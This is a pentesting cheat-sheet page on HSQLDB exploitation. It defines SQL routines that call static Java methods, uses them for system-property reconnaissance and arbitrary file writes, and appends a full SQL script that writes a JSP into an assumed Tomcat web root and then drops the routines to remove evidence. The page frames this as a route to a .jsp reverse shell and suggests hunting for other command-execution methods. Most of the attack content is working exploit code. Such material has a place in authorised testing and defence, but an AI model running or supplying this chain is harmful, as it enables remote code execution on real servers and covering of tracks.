HSQLDB Exploitation

HSQLDB

Only certain types can be used as parameters and return types of a Java routine: mostly Java primitives plus a few simple objects that map directly onto SQL types (for example String to VARCHAR and byte[] to VARBINARY).

You can call Java code from an HSQLDB database by declaring a SQL routine whose EXTERNAL NAME points at a static Java method on the classpath:

The function below returns the result of calling java.lang.System.getProperty with the given key.

CREATE FUNCTION systemprop(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

The same mechanism gives an arbitrary file write, which is enough to drop a .jsp reverse shell into a web root, by wrapping the static JavaUtils.writeBytesToFilename(String, byte[]) method as a procedure:

CREATE PROCEDURE writeBytesToFilename(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

PoC to check whether we can write data to a file (encode the file contents as ASCII hex, e.g. with Decoder in Burp Suite; the hex below is "hello world!"):

call writeBytesToFilename('test.txt', cast ('68656c6c6f20776f726c6421' AS VARBINARY(1024)))

Finding where a relative path is written (the JVM's working directory):

VALUES(systemprop('user.dir'))

writeBytesToFilename lives in an internal JDK package (com.sun.org.apache.xml.internal.security), so on newer Java versions it may be missing or blocked by module encapsulation. Check java.version first; if the call fails, look for other static file-write or command-execution methods in the JDK or in the application's own classes that satisfy the rules below.
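The whole chain as one SQL script, added here as a worked example rather than taken from the original page. It assumes an HSQLDB 2.x session with DBA rights (for example the default SA account), which is what LANGUAGE JAVA routine creation requires; the file paths and the JSP body are constructed placeholders, and the web-root directory is an assumption you would replace with the real one.

```sql
-- Added worked example (not from the original page): end-to-end file write
-- through HSQLDB Java routines. Assumes a DBA-level session (e.g. default SA)
-- on HSQLDB 2.x; paths and the JSP body are constructed for illustration.

-- 1. Bridge to java.lang.System.getProperty (static, String -> String).
CREATE FUNCTION systemprop(IN key VARCHAR) RETURNS VARCHAR
  LANGUAGE JAVA DETERMINISTIC NO SQL
  EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty';

-- 2. Recon: java.version decides whether the internal xml.security class
--    below is still reachable; user.dir is where relative paths land.
VALUES (systemprop('java.version'));
VALUES (systemprop('user.dir'));
VALUES (systemprop('os.name'));

-- 3. Bridge to JavaUtils.writeBytesToFilename(String, byte[]) -> void.
--    VARBINARY(65536) instead of 1024 so a real JSP fits; an argument longer
--    than the declared length fails the parameter cast instead of being cut.
CREATE PROCEDURE writeBytesToFilename(IN filename VARCHAR, IN content VARBINARY(65536))
  LANGUAGE JAVA DETERMINISTIC NO SQL
  EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename';

-- 4. Write probe into the working directory. X'..' is a binary literal
--    ("hello world!" in hex), so '<', '"' and '%' in a payload never need
--    SQL quoting.
CALL writeBytesToFilename(systemprop('user.dir') || '/hsqldb_write_probe.txt',
                          X'68656c6c6f20776f726c6421');

-- 5. Same primitive aimed at an assumed servlet-container web root (placeholder
--    path). The body is the harmless marker page <%= "ok" %>; swap in the real
--    JSP only after the write and the HTTP fetch of probe.jsp are confirmed.
CALL writeBytesToFilename('/var/lib/tomcat/webapps/ROOT/probe.jsp',
                          X'3c253d20226f6b2220253e');

-- 6. Remove the routines so the catalog does not keep evidence of the bridge.
DROP PROCEDURE writeBytesToFilename;
DROP FUNCTION systemprop;
```

Run the steps one at a time: if step 3 errors with a class or method not found (or an illegal access error on Java 9+), the internal class is gone and you need a different static method; if step 4 succeeds but step 5 fails, the problem is the target path or file permissions, not the primitive.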

Rules

The Java method used in a payload has to satisfy the following restrictions:

  • The method must be declared as static.

  • Its parameters should be either primitive types or types that can be mapped to SQL types.

  • The return value must be a primitive, an object compatible with a SQL type, or void.

  • The method should either execute code directly or write files to the system.
